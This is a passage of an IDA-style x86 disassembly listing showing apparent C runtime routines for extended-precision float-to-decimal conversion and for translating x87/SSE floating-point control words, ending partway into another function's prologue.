mov edi, [edi-4]
imul edx, esi
and [ebp+var_70], 0
lea esi, [edi+edx]
cmp esi, edi
jb short loc_412DAD
cmp esi, edx
jnb short loc_412DB4
loc_412DAD: ; CODE XREF: sub_412AB1+2F6�j
mov [ebp+var_70], 1
loc_412DB4: ; CODE XREF: sub_412AB1+2FA�j
cmp [ebp+var_70], 0
mov edi, [ebp+var_44]
mov [edi-4], esi
jz short loc_412DC3
inc word ptr [edi]
loc_412DC3: ; CODE XREF: sub_412AB1+30D�j
add [ebp+var_58], 2
sub [ebp+var_54], 2
dec [ebp+var_50]
cmp [ebp+var_50], 0
jg short loc_412D8C
loc_412DD4: ; CODE XREF: sub_412AB1+2C9�j
inc edi
inc edi
inc [ebp+var_5C]
dec [ebp+var_40]
cmp [ebp+var_40], 0
mov [ebp+var_44], edi
jg short loc_412D6D
add eax, 0C002h
test ax, ax
jle short loc_412E2A
loc_412DEF: ; CODE XREF: sub_412AB1+372�j
test [ebp+var_8], 80000000h
jnz short loc_412E25
mov edx, [ebp+var_10]
mov edi, [ebp+var_C]
mov esi, [ebp+var_C]
shl [ebp+var_10], 1
shr edx, 1Fh
add edi, edi
or edi, edx
mov edx, [ebp+var_8]
shr esi, 1Fh
add edx, edx
or edx, esi
add eax, 0FFFFh
test ax, ax
mov [ebp+var_C], edi
mov [ebp+var_8], edx
jg short loc_412DEF
loc_412E25: ; CODE XREF: sub_412AB1+345�j
test ax, ax
jg short loc_412E7C
loc_412E2A: ; CODE XREF: sub_412AB1+33C�j
add eax, 0FFFFh
test ax, ax
jge short loc_412E7C
mov edx, eax
neg edx
movzx edx, dx
mov [ebp+var_44], edx
add eax, edx
loc_412E40: ; CODE XREF: sub_412AB1+3BE�j
test byte ptr [ebp+var_10], 1
jz short loc_412E49
inc [ebp+var_48]
loc_412E49: ; CODE XREF: sub_412AB1+393�j
mov edx, [ebp+var_8]
mov edi, [ebp+var_C]
mov esi, [ebp+var_C]
shr [ebp+var_8], 1
shl edx, 1Fh
shr edi, 1
or edi, edx
mov edx, [ebp+var_10]
shl esi, 1Fh
shr edx, 1
or edx, esi
dec [ebp+var_44]
mov [ebp+var_C], edi
mov [ebp+var_10], edx
jnz short loc_412E40
cmp [ebp+var_48], 0
jz short loc_412E7C
or word ptr [ebp+var_10], 1
loc_412E7C: ; CODE XREF: sub_412AB1+377�j
; sub_412AB1+381�j ...
cmp word ptr [ebp+var_10], 8000h
ja short loc_412E95
mov edx, [ebp+var_10]
and edx, 1FFFFh
cmp edx, 18000h
jnz short loc_412EC8
loc_412E95: ; CODE XREF: sub_412AB1+3D1�j
cmp [ebp+var_10+2], 0FFFFFFFFh
jnz short loc_412EC5
and [ebp+var_10+2], 0
cmp [ebp+var_C+2], 0FFFFFFFFh
jnz short loc_412EC0
and [ebp+var_C+2], 0
cmp word ptr [ebp+var_8+2], 0FFFFh
jnz short loc_412EBA
mov word ptr [ebp+var_8+2], 8000h
inc eax
jmp short loc_412EC8
; ---------------------------------------------------------------------------
loc_412EBA: ; CODE XREF: sub_412AB1+3FE�j
inc word ptr [ebp+var_8+2]
jmp short loc_412EC8
; ---------------------------------------------------------------------------
loc_412EC0: ; CODE XREF: sub_412AB1+3F2�j
inc [ebp+var_C+2]
jmp short loc_412EC8
; ---------------------------------------------------------------------------
loc_412EC5: ; CODE XREF: sub_412AB1+3E8�j
inc [ebp+var_10+2]
loc_412EC8: ; CODE XREF: sub_412AB1+3E2�j
; sub_412AB1+407�j ...
cmp ax, 7FFFh
jnb short loc_412EEA
mov dx, word ptr [ebp+var_10+2]
mov word ptr [ebp+var_20], dx
mov edx, [ebp+var_C]
mov [ebp+var_20+2], edx
mov edx, [ebp+var_8]
or eax, ecx
mov [ebp+var_1A], edx
mov word ptr [ebp+var_16], ax
jmp short loc_412F06
; ---------------------------------------------------------------------------
loc_412EEA: ; CODE XREF: sub_412AB1+230�j
; sub_412AB1+239�j ...
neg cx
sbb ecx, ecx
and dword ptr [ebp-1Ch], 0
and ecx, 80000000h
add ecx, 7FFF8000h
and [ebp+var_20], 0
mov [ebp+var_1A+2], ecx
loc_412F06: ; CODE XREF: sub_412AB1+1D6�j
; sub_412AB1+25A�j ...
test ebx, ebx
jnz loc_412C79
xor eax, eax
loc_412F10: ; CODE XREF: sub_412AB1+1AB�j
; sub_412AB1+1C2�j
mov ecx, [ebp+var_1A+2]
shr ecx, 10h
cmp cx, 3FFFh
mov ebx, 7FFFh
jb loc_413170
mov esi, [ebp+var_28+2]
inc [ebp+var_4C]
movzx edx, cx
mov ecx, esi
xor ecx, edx
and edx, ebx
and esi, ebx
and ecx, 8000h
cmp dx, bx
lea edi, [esi+edx]
mov [ebp+var_58], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
movzx edi, di
jnb loc_413156
cmp si, bx
jnb loc_413156
cmp di, 0BFFDh
ja loc_413156
cmp di, 3FBFh
ja short loc_412F7B
loc_412F73: ; CODE XREF: sub_412AB1+503�j
mov [ebp+var_1A+2], eax
jmp loc_41316A
; ---------------------------------------------------------------------------
loc_412F7B: ; CODE XREF: sub_412AB1+4C0�j
cmp dx, ax
jnz short loc_412F9D
inc edi
test [ebp+var_1A+2], 7FFFFFFFh
jnz short loc_412F9D
cmp [ebp-1Ch], eax
jnz short loc_412F9D
cmp [ebp+var_20], eax
jnz short loc_412F9D
mov word ptr [ebp+var_16], ax
jmp loc_413170
; ---------------------------------------------------------------------------
loc_412F9D: ; CODE XREF: sub_412AB1+4CD�j
; sub_412AB1+4D7�j ...
cmp si, ax
jnz short loc_412FB6
inc edi
test [ebp+var_28], 7FFFFFFFh
jnz short loc_412FB6
cmp [ebp+var_2C], eax
jnz short loc_412FB6
cmp [ebp+var_30], eax
jz short loc_412F73
loc_412FB6: ; CODE XREF: sub_412AB1+4EF�j
; sub_412AB1+4F9�j ...
and [ebp+var_54], 0
lea eax, [ebp+var_C]
mov [ebp+var_40], 5
loc_412FC4: ; CODE XREF: sub_412AB1+580�j
mov edx, [ebp+var_54]
mov esi, [ebp+var_40]
add edx, edx
test esi, esi
mov [ebp+var_50], esi
jle short loc_413025
lea esi, [ebp+var_28]
lea edx, [ebp+edx+var_20]
mov [ebp+var_5C], esi
mov [ebp+var_48], edx
loc_412FE0: ; CODE XREF: sub_412AB1+572�j
mov edx, [ebp+var_5C]
mov esi, [ebp+var_48]
movzx esi, word ptr [esi]
movzx edx, word ptr [edx]
and [ebp+var_44], 0
imul edx, esi
mov esi, [eax-4]
lea ebx, [esi+edx]
cmp ebx, esi
jb short loc_413001
cmp ebx, edx
jnb short loc_413008
loc_413001: ; CODE XREF: sub_412AB1+54A�j
mov [ebp+var_44], 1
loc_413008: ; CODE XREF: sub_412AB1+54E�j
cmp [ebp+var_44], 0
mov [eax-4], ebx
jz short loc_413014
inc word ptr [eax]
loc_413014: ; CODE XREF: sub_412AB1+55E�j
add [ebp+var_48], 2
sub [ebp+var_5C], 2
dec [ebp+var_50]
cmp [ebp+var_50], 0
jg short loc_412FE0
loc_413025: ; CODE XREF: sub_412AB1+520�j
inc eax
inc eax
inc [ebp+var_54]
dec [ebp+var_40]
cmp [ebp+var_40], 0
jg short loc_412FC4
add edi, 0C002h
xor eax, eax
cmp di, ax
jle short loc_41307C
loc_413040: ; CODE XREF: sub_412AB1+5C4�j
test [ebp+var_8], 80000000h
jnz short loc_413077
mov edx, [ebp+var_10]
mov ebx, [ebp+var_C]
mov esi, [ebp+var_C]
shl [ebp+var_10], 1
shr edx, 1Fh
add ebx, ebx
or ebx, edx
mov edx, [ebp+var_8]
shr esi, 1Fh
add edx, edx
or edx, esi
add edi, 0FFFFh
cmp di, ax
mov [ebp+var_C], ebx
mov [ebp+var_8], edx
jg short loc_413040
loc_413077: ; CODE XREF: sub_412AB1+596�j
cmp di, ax
jg short loc_4130CB
loc_41307C: ; CODE XREF: sub_412AB1+58D�j
add edi, 0FFFFh
cmp di, ax
jge short loc_4130CB
mov eax, edi
neg eax
movzx eax, ax
add edi, eax
loc_413090: ; CODE XREF: sub_412AB1+60C�j
test byte ptr [ebp+var_10], 1
jz short loc_413099
inc [ebp+var_58]
loc_413099: ; CODE XREF: sub_412AB1+5E3�j
mov edx, [ebp+var_8]
mov ebx, [ebp+var_C]
mov esi, [ebp+var_C]
shr [ebp+var_8], 1
shl edx, 1Fh
shr ebx, 1
or ebx, edx
mov edx, [ebp+var_10]
shl esi, 1Fh
shr edx, 1
or edx, esi
dec eax
mov [ebp+var_C], ebx
mov [ebp+var_10], edx
jnz short loc_413090
xor eax, eax
cmp [ebp+var_58], eax
jz short loc_4130CB
or word ptr [ebp+var_10], 1
loc_4130CB: ; CODE XREF: sub_412AB1+5C9�j
; sub_412AB1+5D4�j ...
cmp word ptr [ebp+var_10], 8000h
ja short loc_4130E4
mov edx, [ebp+var_10]
and edx, 1FFFFh
cmp edx, 18000h
jnz short loc_413115
loc_4130E4: ; CODE XREF: sub_412AB1+620�j
cmp [ebp+var_10+2], 0FFFFFFFFh
jnz short loc_413112
cmp [ebp+var_C+2], 0FFFFFFFFh
mov [ebp+var_10+2], eax
jnz short loc_41310D
cmp word ptr [ebp+var_8+2], 0FFFFh
mov [ebp+var_C+2], eax
jnz short loc_413107
mov word ptr [ebp+var_8+2], 8000h
inc edi
jmp short loc_413115
; ---------------------------------------------------------------------------
loc_413107: ; CODE XREF: sub_412AB1+64B�j
inc word ptr [ebp+var_8+2]
jmp short loc_413115
; ---------------------------------------------------------------------------
loc_41310D: ; CODE XREF: sub_412AB1+640�j
inc [ebp+var_C+2]
jmp short loc_413115
; ---------------------------------------------------------------------------
loc_413112: ; CODE XREF: sub_412AB1+637�j
inc [ebp+var_10+2]
loc_413115: ; CODE XREF: sub_412AB1+631�j
; sub_412AB1+654�j ...
cmp di, 7FFFh
jb short loc_41313A
neg cx
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
sbb ecx, ecx
and ecx, 80000000h
add ecx, 7FFF8000h
mov [ebp+var_1A+2], ecx
loc_413136: ; CODE XREF: sub_412AB1+6A3�j
xor eax, eax
jmp short loc_413170
; ---------------------------------------------------------------------------
loc_41313A: ; CODE XREF: sub_412AB1+669�j
mov ax, word ptr [ebp+var_10+2]
mov word ptr [ebp+var_20], ax
mov eax, [ebp+var_C]
mov [ebp+var_20+2], eax
mov eax, [ebp+var_8]
or edi, ecx
mov [ebp+var_1A], eax
mov word ptr [ebp+var_16], di
jmp short loc_413136
; ---------------------------------------------------------------------------
loc_413156: ; CODE XREF: sub_412AB1+4A1�j
; sub_412AB1+4AA�j ...
neg cx
sbb ecx, ecx
and ecx, 80000000h
add ecx, 7FFF8000h
mov [ebp+var_1A+2], ecx
loc_41316A: ; CODE XREF: sub_412AB1+4C5�j
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
loc_413170: ; CODE XREF: sub_412AB1+46F�j
; sub_412AB1+4E7�j ...
test [ebp+arg_10], 1
mov edx, [ebp+var_60]
mov ecx, [ebp+var_4C]
mov [edx], cx
jz short loc_4131B1
movsx ecx, cx
add [ebp+arg_C], ecx
cmp [ebp+arg_C], eax
jg short loc_4131B1
and word ptr [edx], 0
cmp word ptr [ebp+var_6C], 8000h
mov byte ptr [edx+3], 1
setnz al
dec al
and al, 0Dh
add al, 20h
mov [edx+2], al
mov byte ptr [edx+4], 30h
mov byte ptr [edx+5], 0
jmp loc_412B60
; ---------------------------------------------------------------------------
loc_4131B1: ; CODE XREF: sub_412AB1+6CC�j
; sub_412AB1+6D7�j
push 15h
pop ecx
cmp [ebp+arg_C], ecx
jle short loc_4131BC
mov [ebp+arg_C], ecx
loc_4131BC: ; CODE XREF: sub_412AB1+706�j
mov esi, [ebp+var_1A+2]
shr esi, 10h
push 8
sub esi, 3FFEh
mov word ptr [ebp+var_16], ax
pop ebx
loc_4131CF: ; CODE XREF: sub_412AB1+742�j
mov eax, [ebp+var_20]
mov edi, [ebp-1Ch]
mov ecx, [ebp-1Ch]
shl [ebp+var_20], 1
shr eax, 1Fh
add edi, edi
or edi, eax
mov eax, [ebp+var_1A+2]
shr ecx, 1Fh
add eax, eax
or eax, ecx
dec ebx
mov [ebp-1Ch], edi
mov [ebp+var_1A+2], eax
jnz short loc_4131CF
test esi, esi
jge short loc_41322B
neg esi
and esi, 0FFh
jle short loc_41322B
loc_413203: ; CODE XREF: sub_412AB1+778�j
mov eax, [ebp+var_1A+2]
mov edi, [ebp-1Ch]
mov ecx, [ebp-1Ch]
shr [ebp+var_1A+2], 1
shl eax, 1Fh
shr edi, 1
or edi, eax
mov eax, [ebp+var_20]
shl ecx, 1Fh
shr eax, 1
or eax, ecx
dec esi
test esi, esi
mov [ebp-1Ch], edi
mov [ebp+var_20], eax
jg short loc_413203
loc_41322B: ; CODE XREF: sub_412AB1+746�j
; sub_412AB1+750�j
mov eax, [ebp+arg_C]
inc eax
test eax, eax
lea ebx, [edx+4]
mov [ebp+var_40], ebx
mov [ebp+var_4C], eax
jle loc_4132F5
loc_413240: ; CODE XREF: sub_412AB1+83E�j
mov edx, [ebp+var_20]
mov eax, [ebp-1Ch]
lea esi, [ebp+var_20]
lea edi, [ebp+var_3C]
movsd
movsd
movsd
shl [ebp+var_20], 1
mov edi, [ebp+var_20]
shl [ebp+var_20], 1
shr edx, 1Fh
lea ecx, [eax+eax]
or ecx, edx
mov edx, [ebp+var_1A+2]
mov esi, eax
shr esi, 1Fh
add edx, edx
or edx, esi
mov eax, ecx
lea esi, [ecx+ecx]
shr eax, 1Fh
lea ecx, [edx+edx]
mov edx, [ebp+var_3C]
shr edi, 1Fh
or ecx, eax
mov eax, [ebp+var_20]
or esi, edi
lea edi, [edx+eax]
cmp edi, eax
jb short loc_41328F
cmp edi, edx
jnb short loc_4132A7
loc_41328F: ; CODE XREF: sub_412AB1+7D8�j
lea eax, [esi+1]
xor edx, edx
cmp eax, esi
jb short loc_41329D
cmp eax, 1
jnb short loc_4132A0
loc_41329D: ; CODE XREF: sub_412AB1+7E5�j
xor edx, edx
inc edx
loc_4132A0: ; CODE XREF: sub_412AB1+7EA�j
test edx, edx
mov esi, eax
jz short loc_4132A7
inc ecx
loc_4132A7: ; CODE XREF: sub_412AB1+7DC�j
; sub_412AB1+7F3�j
mov eax, [ebp+var_38]
lea edx, [eax+esi]
cmp edx, esi
mov [ebp+var_44], edx
jb short loc_4132B8
cmp edx, eax
jnb short loc_4132B9
loc_4132B8: ; CODE XREF: sub_412AB1+801�j
inc ecx
loc_4132B9: ; CODE XREF: sub_412AB1+805�j
add ecx, [ebp+var_34]
shr edx, 1Fh
add ecx, ecx
or ecx, edx
lea esi, [edi+edi]
mov [ebp+var_20], esi
mov esi, [ebp+var_44]
mov [ebp+var_1A+2], ecx
shr ecx, 18h
add esi, esi
add cl, 30h
mov eax, edi
shr eax, 1Fh
or esi, eax
mov [ebx], cl
inc ebx
dec [ebp+var_4C]
cmp [ebp+var_4C], 0
mov [ebp-1Ch], esi
mov byte ptr [ebp+var_16+1], 0
jg loc_413240
loc_4132F5: ; CODE XREF: sub_412AB1+789�j
dec ebx
mov al, [ebx]
dec ebx
cmp al, 35h
jge short loc_41330B
mov ecx, [ebp+var_40]
jmp short loc_413346
; ---------------------------------------------------------------------------
loc_413302: ; CODE XREF: sub_412AB1+85D�j
cmp byte ptr [ebx], 39h
jnz short loc_413310
mov byte ptr [ebx], 30h
dec ebx
loc_41330B: ; CODE XREF: sub_412AB1+84A�j
cmp ebx, [ebp+var_40]
jnb short loc_413302
loc_413310: ; CODE XREF: sub_412AB1+854�j
cmp ebx, [ebp+var_40]
mov eax, [ebp+var_60]
jnb short loc_41331C
inc ebx
inc word ptr [eax]
loc_41331C: ; CODE XREF: sub_412AB1+865�j
inc byte ptr [ebx]
loc_41331E: ; CODE XREF: sub_412AB1+89E�j
sub bl, al
sub bl, 3
movsx ecx, bl
mov [eax+3], bl
mov byte ptr [ecx+eax+4], 0
mov eax, [ebp+var_74]
loc_413331: ; CODE XREF: sub_412AB1+B2�j
; sub_412AB1+15B�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
; ---------------------------------------------------------------------------
loc_413340: ; CODE XREF: sub_412AB1+897�j
cmp byte ptr [ebx], 30h
jnz short loc_41334A
dec ebx
loc_413346: ; CODE XREF: sub_412AB1+84F�j
cmp ebx, ecx
jnb short loc_413340
loc_41334A: ; CODE XREF: sub_412AB1+892�j
cmp ebx, ecx
mov eax, [ebp+var_60]
jnb short loc_41331E
and word ptr [eax], 0
cmp word ptr [ebp+var_6C], 8000h
mov byte ptr [eax+3], 1
setnz dl
dec dl
and dl, 0Dh
add dl, 20h
mov [eax+2], dl
mov byte ptr [ecx], 30h
mov byte ptr [eax+5], 0
jmp loc_412B60
sub_412AB1 endp
; =============== S U B R O U T I N E =======================================
sub_413379 proc near ; CODE XREF: sub_4134A7+C0�p
xor eax, eax
test bl, 10h
jz short loc_413381
inc eax
loc_413381: ; CODE XREF: sub_413379+5�j
test bl, 8
jz short loc_413389
or eax, 4
loc_413389: ; CODE XREF: sub_413379+B�j
test bl, 4
jz short loc_413391
or eax, 8
loc_413391: ; CODE XREF: sub_413379+13�j
test bl, 2
jz short loc_413399
or eax, 10h
loc_413399: ; CODE XREF: sub_413379+1B�j
test bl, 1
jz short loc_4133A1
or eax, 20h
loc_4133A1: ; CODE XREF: sub_413379+23�j
test ebx, 80000h
jz short loc_4133AC
or eax, 2
loc_4133AC: ; CODE XREF: sub_413379+2E�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
push esi
mov esi, 200h
jz short loc_4133E0
cmp ecx, 100h
jz short loc_4133DB
cmp ecx, esi
jz short loc_4133D4
cmp ecx, edx
jnz short loc_4133E0
or eax, 0C00h
jmp short loc_4133E0
; ---------------------------------------------------------------------------
loc_4133D4: ; CODE XREF: sub_413379+4E�j
or eax, 800h
jmp short loc_4133E0
; ---------------------------------------------------------------------------
loc_4133DB: ; CODE XREF: sub_413379+4A�j
or eax, 400h
loc_4133E0: ; CODE XREF: sub_413379+42�j
; sub_413379+52�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_4133F6
cmp ecx, 10000h
jnz short loc_4133F8
or eax, esi
jmp short loc_4133F8
; ---------------------------------------------------------------------------
loc_4133F6: ; CODE XREF: sub_413379+6F�j
or eax, edx
loc_4133F8: ; CODE XREF: sub_413379+77�j
; sub_413379+7B�j
test ebx, 40000h
pop esi
jz short locret_413406
or eax, 1000h
locret_413406: ; CODE XREF: sub_413379+86�j
retn
sub_413379 endp
; =============== S U B R O U T I N E =======================================
sub_413407 proc near ; CODE XREF: sub_4134A7:loc_4136E0�p
xor eax, eax
test dl, 10h
jz short loc_413413
mov eax, 80h
loc_413413: ; CODE XREF: sub_413407+5�j
test dl, 8
push ebx
push esi
push edi
mov ebx, 200h
jz short loc_413422
or eax, ebx
loc_413422: ; CODE XREF: sub_413407+17�j
test dl, 4
jz short loc_41342C
or eax, 400h
loc_41342C: ; CODE XREF: sub_413407+1E�j
test dl, 2
jz short loc_413436
or eax, 800h
loc_413436: ; CODE XREF: sub_413407+28�j
test dl, 1
jz short loc_413440
or eax, 1000h
loc_413440: ; CODE XREF: sub_413407+32�j
test edx, 80000h
mov edi, 100h
jz short loc_41344F
or eax, edi
loc_41344F: ; CODE XREF: sub_413407+44�j
mov ecx, edx
mov esi, 300h
and ecx, esi
jz short loc_413479
cmp ecx, edi
jz short loc_413474
cmp ecx, ebx
jz short loc_41346D
cmp ecx, esi
jnz short loc_413479
or eax, 6000h
jmp short loc_413479
; ---------------------------------------------------------------------------
loc_41346D: ; CODE XREF: sub_413407+59�j
or eax, 4000h
jmp short loc_413479
; ---------------------------------------------------------------------------
loc_413474: ; CODE XREF: sub_413407+55�j
or eax, 2000h
loc_413479: ; CODE XREF: sub_413407+51�j
; sub_413407+5D�j ...
mov ecx, 3000000h
pop edi
and edx, ecx
cmp edx, 1000000h
pop esi
pop ebx
jz short loc_4134A1
cmp edx, 2000000h
jz short loc_41349D
cmp edx, ecx
jnz short locret_4134A6
or eax, 8000h
retn
; ---------------------------------------------------------------------------
loc_41349D: ; CODE XREF: sub_413407+8A�j
or eax, 40h
retn
; ---------------------------------------------------------------------------
loc_4134A1: ; CODE XREF: sub_413407+82�j
or eax, 8040h
locret_4134A6: ; CODE XREF: sub_413407+8E�j
retn
sub_413407 endp
; =============== S U B R O U T I N E =======================================
sub_4134A7 proc near ; CODE XREF: sub_4118FF+25�p
; sub_4118FF+55�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 10h
push ebx
push ebp
push esi
push edi
fstcw word ptr [esp+20h+var_C]
mov ebx, [esp+20h+var_C]
xor edx, edx
test bl, 1
jz short loc_4134C1
push 10h
pop edx
loc_4134C1: ; CODE XREF: sub_4134A7+15�j
test bl, 4
jz short loc_4134C9
or edx, 8
loc_4134C9: ; CODE XREF: sub_4134A7+1D�j
test bl, 8
jz short loc_4134D1
or edx, 4
loc_4134D1: ; CODE XREF: sub_4134A7+25�j
test bl, 10h
jz short loc_4134D9
or edx, 2
loc_4134D9: ; CODE XREF: sub_4134A7+2D�j
test bl, 20h
jz short loc_4134E1
or edx, 1
loc_4134E1: ; CODE XREF: sub_4134A7+35�j
test bl, 2
jz short loc_4134EC
or edx, 80000h
loc_4134EC: ; CODE XREF: sub_4134A7+3D�j
movzx ecx, bx
mov eax, ecx
mov edi, 0C00h
and eax, edi
mov ebp, 300h
mov esi, 200h
jz short loc_413524
cmp eax, 400h
jz short loc_41351E
cmp eax, 800h
jz short loc_41351A
cmp eax, edi
jnz short loc_413524
or edx, ebp
jmp short loc_413524
; ---------------------------------------------------------------------------
loc_41351A: ; CODE XREF: sub_4134A7+69�j
or edx, esi
jmp short loc_413524
; ---------------------------------------------------------------------------
loc_41351E: ; CODE XREF: sub_4134A7+62�j
or edx, 100h
loc_413524: ; CODE XREF: sub_4134A7+5B�j
; sub_4134A7+6D�j ...
and ecx, ebp
jz short loc_413534
cmp ecx, esi
jnz short loc_41353A
or edx, 10000h
jmp short loc_41353A
; ---------------------------------------------------------------------------
loc_413534: ; CODE XREF: sub_4134A7+7F�j
or edx, 20000h
loc_41353A: ; CODE XREF: sub_4134A7+83�j
; sub_4134A7+8B�j
test bx, 1000h
jz short loc_413547
or edx, 40000h
loc_413547: ; CODE XREF: sub_4134A7+98�j
mov esi, [esp+20h+arg_4]
mov ecx, [esp+20h+arg_0]
mov eax, esi
not eax
and eax, edx
and ecx, esi
or eax, ecx
cmp eax, edx
mov [esp+20h+var_4], eax
jz loc_41360F
mov ebx, eax
call sub_413379
movzx eax, ax
mov [esp+20h+var_10], eax
fldcw word ptr [esp+20h+var_10]
fstcw word ptr [esp+20h+var_10]
mov ebx, [esp+20h+var_10]
xor edx, edx
test bl, 1
jz short loc_41358A
push 10h
pop edx
loc_41358A: ; CODE XREF: sub_4134A7+DE�j
test bl, 4
jz short loc_413592
or edx, 8
loc_413592: ; CODE XREF: sub_4134A7+E6�j
test bl, 8
jz short loc_41359A
or edx, 4
loc_41359A: ; CODE XREF: sub_4134A7+EE�j
test bl, 10h
jz short loc_4135A2
or edx, 2
loc_4135A2: ; CODE XREF: sub_4134A7+F6�j
test bl, 20h
jz short loc_4135AA
or edx, 1
loc_4135AA: ; CODE XREF: sub_4134A7+FE�j
test bl, 2
jz short loc_4135B5
or edx, 80000h
loc_4135B5: ; CODE XREF: sub_4134A7+106�j
movzx ecx, bx
mov eax, ecx
and eax, edi
jz short loc_4135E2
cmp eax, 400h
jz short loc_4135DC
cmp eax, 800h
jz short loc_4135D4
cmp eax, edi
jnz short loc_4135E2
or edx, ebp
jmp short loc_4135E2
; ---------------------------------------------------------------------------
loc_4135D4: ; CODE XREF: sub_4134A7+123�j
or edx, 200h
jmp short loc_4135E2
; ---------------------------------------------------------------------------
loc_4135DC: ; CODE XREF: sub_4134A7+11C�j
or edx, 100h
loc_4135E2: ; CODE XREF: sub_4134A7+115�j
; sub_4134A7+127�j ...
and ecx, ebp
jz short loc_4135F6
cmp ecx, 200h
jnz short loc_4135FC
or edx, 10000h
jmp short loc_4135FC
; ---------------------------------------------------------------------------
loc_4135F6: ; CODE XREF: sub_4134A7+13D�j
or edx, 20000h
loc_4135FC: ; CODE XREF: sub_4134A7+145�j
; sub_4134A7+14D�j
test bx, 1000h
jz short loc_413609
or edx, 40000h
loc_413609: ; CODE XREF: sub_4134A7+15A�j
mov eax, edx
mov [esp+20h+var_4], edx
loc_41360F: ; CODE XREF: sub_4134A7+B8�j
cmp ds:dword_433C7C, 0
jz loc_4137A2
and esi, 308031Fh
mov edi, esi
stmxcsr [esp+20h+var_8]
mov eax, [esp+20h+var_8]
xor esi, esi
test al, al
jns short loc_413636
push 10h
pop esi
loc_413636: ; CODE XREF: sub_4134A7+18A�j
test ax, 200h
jz short loc_41363F
or esi, 8
loc_41363F: ; CODE XREF: sub_4134A7+193�j
test ax, 400h
jz short loc_413648
or esi, 4
loc_413648: ; CODE XREF: sub_4134A7+19C�j
test ax, 800h
jz short loc_413651
or esi, 2
loc_413651: ; CODE XREF: sub_4134A7+1A5�j
test ax, 1000h
jz short loc_41365A
or esi, 1
loc_41365A: ; CODE XREF: sub_4134A7+1AE�j
test ax, 100h
jz short loc_413666
or esi, 80000h
loc_413666: ; CODE XREF: sub_4134A7+1B7�j
mov ecx, eax
mov ebp, 6000h
and ecx, ebp
jz short loc_41369B
cmp ecx, 2000h
jz short loc_413695
cmp ecx, 4000h
jz short loc_41368D
cmp ecx, ebp
jnz short loc_41369B
or esi, 300h
jmp short loc_41369B
; ---------------------------------------------------------------------------
loc_41368D: ; CODE XREF: sub_4134A7+1D8�j
or esi, 200h
jmp short loc_41369B
; ---------------------------------------------------------------------------
loc_413695: ; CODE XREF: sub_4134A7+1D0�j
or esi, 100h
loc_41369B: ; CODE XREF: sub_4134A7+1C8�j
; sub_4134A7+1DC�j ...
mov ebx, 8040h
and eax, ebx
sub eax, 40h
jz short loc_4136C3
sub eax, 7FC0h
jz short loc_4136BB
sub eax, 40h
jnz short loc_4136C9
or esi, 1000000h
jmp short loc_4136C9
; ---------------------------------------------------------------------------
loc_4136BB: ; CODE XREF: sub_4134A7+205�j
or esi, 3000000h
jmp short loc_4136C9
; ---------------------------------------------------------------------------
loc_4136C3: ; CODE XREF: sub_4134A7+1FE�j
or esi, 2000000h
loc_4136C9: ; CODE XREF: sub_4134A7+20A�j
; sub_4134A7+212�j ...
mov edx, edi
and edi, [esp+20h+arg_0]
not edx
and edx, esi
or edx, edi
cmp edx, esi
jnz short loc_4136E0
mov eax, esi
jmp loc_41378B
; ---------------------------------------------------------------------------
loc_4136E0: ; CODE XREF: sub_4134A7+230�j
call sub_413407
push eax
mov [esp+24h+arg_4], eax
call sub_4100DA
pop ecx
stmxcsr [esp+20h+arg_4]
mov eax, [esp+20h+arg_4]
xor edx, edx
test al, al
jns short loc_413702
push 10h
pop edx
loc_413702: ; CODE XREF: sub_4134A7+256�j
mov edi, 200h
test eax, edi
jz short loc_41370E
or edx, 8
loc_41370E: ; CODE XREF: sub_4134A7+262�j
test ax, 400h
jz short loc_413717
or edx, 4
loc_413717: ; CODE XREF: sub_4134A7+26B�j
test ax, 800h
jz short loc_413720
or edx, 2
loc_413720: ; CODE XREF: sub_4134A7+274�j
test ax, 1000h
jz short loc_413729
or edx, 1
loc_413729: ; CODE XREF: sub_4134A7+27D�j
mov esi, 100h
test eax, esi
jz short loc_413738
or edx, 80000h
loc_413738: ; CODE XREF: sub_4134A7+289�j
mov ecx, eax
and ecx, ebp
jz short loc_413760
cmp ecx, 2000h
jz short loc_41375E
cmp ecx, 4000h
jz short loc_41375A
cmp ecx, ebp
jnz short loc_413760
or edx, 300h
jmp short loc_413760
; ---------------------------------------------------------------------------
loc_41375A: ; CODE XREF: sub_4134A7+2A5�j
or edx, edi
jmp short loc_413760
; ---------------------------------------------------------------------------
loc_41375E: ; CODE XREF: sub_4134A7+29D�j
or edx, esi
loc_413760: ; CODE XREF: sub_4134A7+295�j
; sub_4134A7+2A9�j ...
and eax, ebx
sub eax, 40h
jz short loc_413783
sub eax, 7FC0h
jz short loc_41377B
sub eax, 40h
jnz short loc_413789
or edx, 1000000h
jmp short loc_413789
; ---------------------------------------------------------------------------
loc_41377B: ; CODE XREF: sub_4134A7+2C5�j
or edx, 3000000h
jmp short loc_413789
; ---------------------------------------------------------------------------
loc_413783: ; CODE XREF: sub_4134A7+2BE�j
or edx, 2000000h
loc_413789: ; CODE XREF: sub_4134A7+2CA�j
; sub_4134A7+2D2�j ...
mov eax, edx
loc_41378B: ; CODE XREF: sub_4134A7+234�j
mov ecx, [esp+20h+var_4]
mov edx, eax
xor edx, ecx
or eax, ecx
test edx, 8031Fh
jz short loc_4137A2
or eax, 80000000h
loc_4137A2: ; CODE XREF: sub_4134A7+16F�j
; sub_4134A7+2F4�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 10h
retn
sub_4134A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4137AA proc near ; CODE XREF: sub_4123ED+326�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
push ebx
push esi
xor esi, esi
cmp [ebp+arg_4], esi
push edi
mov [ebp+var_18], 404Eh
